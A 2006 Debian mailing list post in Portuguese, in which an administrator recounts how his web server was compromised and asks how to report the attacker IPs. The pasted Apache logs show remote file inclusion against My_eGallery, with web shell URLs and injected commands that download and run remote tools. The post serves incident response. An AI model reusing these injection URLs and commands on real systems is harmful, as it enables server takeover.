[msg longa] Re: Invadiram servidor e trocaram senha root .... O que fazer???

To: Debian <debian-user-portuguese@lists.debian.org>
Subject: [msg longa] Re: Invadiram servidor e trocaram senha root .... O que fazer???
From: Marcelo Luiz de Laia <mlaia@fcav.unesp.br>
Date: Fri, 23 Jun 2006 14:47:05 -0300
Message-id: <[🔎] 449C2919.6040809@fcav.unesp.br>
In-reply-to: <4472E4B7.7080006@fcav.unesp.br>
References: <4472E4B7.7080006@fcav.unesp.br>

Marcelo Luiz de Laia wrote:

Ola,
Invadiram o servidor web da APG aqui. Trocaram a senha do root ecomecaram a enviar spam a partir dele. Fui la e despluguei ele da rede.
No entanto, nao sei por onde comecar.
Tive lendo no historico da lista que o melhor seria re-instalar tudo apartir do zero!!!! Mas, seria isso mesmo necessario?
Outra coisa: onde e o que eu teria que olhar para descobrir algo sobreo acesso??
Qualquer sugestao me sera util.

Esta instalado o debian estavel sem servidor x.

Obrigado

Ola Pessoal,

So para relatar o que aconteceu depois da invasao.

Recuperei a senha do root com auxilio de um live-cd.

Procurei nos arquivos de log do apache e encontrei o seguinte:

85.107.33.26 - - [28/Apr/2006:20:07:55 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?HTTP/1.1" 200 4234 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:07:58 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=homeHTTP/1.1" 200 221"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:00 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=forwardHTTP/1.1" 200 131"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:03 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=upHTTP/1.1" 200 211"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:05 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=searchHTTP/1.1" 200 262"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:06 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=backHTTP/1.1" 200 131"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:07 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refreshHTTP/1.1" 200 212"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:08 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=bufferHTTP/1.1" 200 175"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:14 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0aHTTP/1.1" 200 4910"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http://hackeramca.tripod.com/c99shell.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:17 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=refreshHTTP/1.1" 200 212"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:19 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=sort_ascHTTP/1.1" 200 97"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:23 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=bufferHTTP/1.1" 200 175"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:33 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2FwwwHTTP/1.1" 200 3134"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:43 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2FwwwHTTP/1.1" 200 3134"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=ls&d=%2Fvar%2Fwww%2F&sort=0a";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:46 -0300] "GET/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=img&img=bufferHTTP/1.1" 200 175"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"85.107.33.26 - - [28/Apr/2006:20:08:51 -0300] "POST/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&HTTP/1.1" 200 3152"http://my_site.com/modules/My_eGallery/public/displayCategory.php?basepath=http%3A%2F%2Fhackeramca.tripod.com%2Fc99shell.txt%3F&act=chmod&f=index.php&d=%2Fvar%2Fwww";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

202.143.102.139 - - [28/Apr/2006:21:11:35 -0300] "GET/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2044 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:13:39 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2152"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:13:54 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2032"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:14:04 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2081"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:14:12 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2073"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:14:18 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2161"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:14:34 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2079"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:14:42 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2079"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:16:05 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2035"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:17:18 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2076"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:17:23 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2161"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:21:12 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 1966"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:22:13 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2249"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:22:40 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2052"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:22:46 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2322"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:23:15 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2282"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:23:40 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2703"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:24:08 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2117"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:24:19 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2052"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"202.143.102.139 - - [28/Apr/2006:21:26:58 -0300] "POST/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?HTTP/1.1" 200 2109"http://my_site.com/modules/My_eGallery/index.php?basepath=http://channel-botol.org/index.txt?";"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

201.69.37.104 - - [29/Apr/2006:03:21:18 -0300] "GET/modules.php?op=modload&name=My_eGallery&file=index&do=showpic&pid=2HTTP/1.1" 200 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"201.69.37.104 - - [29/Apr/2006:03:21:29 -0300] "GET//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=idHTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"201.69.37.104 - - [29/Apr/2006:03:23:52 -0300] "GET//modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=uptimeHTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"201.69.37.104 - - [29/Apr/2006:03:23:59 -0300] "GET//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=idHTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"201.69.37.104 - - [29/Apr/2006:03:24:08 -0300] "GET//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=idHTTP/1.1" 200 8755 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"201.69.37.104 - - [29/Apr/2006:03:24:14 -0300] "GET//modules/My_eGallery/public/displayCategory.php?basepath=?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bashHTTP/1.1" 200 848 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"201.69.37.104 - - [29/Apr/2006:03:24:38 -0300] "GET//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=uptimeHTTP/1.1" 200 8780 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"201.69.37.104 - - [29/Apr/2006:03:25:24 -0300] "GET//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/var/tmp;curl%20-o%20ryo.tar.gz%20http://badboybm.100free.com/ryo.tar.gz;tar%20-zxvf%20ryo.tar.gz;cd%20.access.log;./config%20identd%201988;./run;./f***HTTP/1.1" 200 9021 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"201.69.37.104 - - [29/Apr/2006:03:25:55 -0300] "GET//modules/My_eGallery/public/displayCategory.php?basepath=http://triton2006.100free.com/cmd.txt?&cmd=cd%20/tmp;curl%20-o%20abnc.txt%20www.pharoeste.net/abnc.txt;perl%20abnc.txt%20-n%20-s%20xolkx%20-p%205555%20-P%20bashHTTP/1.1" 200 8944 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 9Cool"


Descobri que o cara usou esse escript:

http://triton2006.100free.com/cmd.txt

Entao, eu restaurei a senha do root. Rodei um rootkit para ver se haviaalguma mudanca. Nao encontrou nada.

Desabilitei o modulo My_eGallery do site e pus um script no profile doroot para me avisar quando alguem efetivasse login como root.


Pois bem, depois de duas semanas alguem efetuou login como root novamente:

detectado em apg

O usuário <<< root >>> efetuou login no servidor.
Máquina acessada: apg.
Data do acesso: Sex Jun 23 13:35:28 BRT 2006.
IP do acesso: 201.78.50.60 4001 6336.
TTY: /dev/pts/0

Desliguei o cabo de rede imediatamente!

Agora, eu gostaria de saber como relatar esses numeros de IPs para as autoridades, etc...

--
Marcelo Luiz de Laia
Ph.D Candidate
São Paulo State University (http://www.unesp.br/eng/)
School of Agricultural and Veterinary Sciences
Department of  Technology
Via de Acesso Prof.Paulo Donato Castellane s/n
14884-900   Jaboticabal - SP - Brazil
Fone: +55-016-3209-2675
Cell: +55-016-97098526

Reply to:

Prev by Date: Re: acento mozilla/netscape
Next by Date: recebimento
Previous by thread: Re: Gerenciado de donwloads wget
Next by thread: recebimento
Index(es):
- Date
- Thread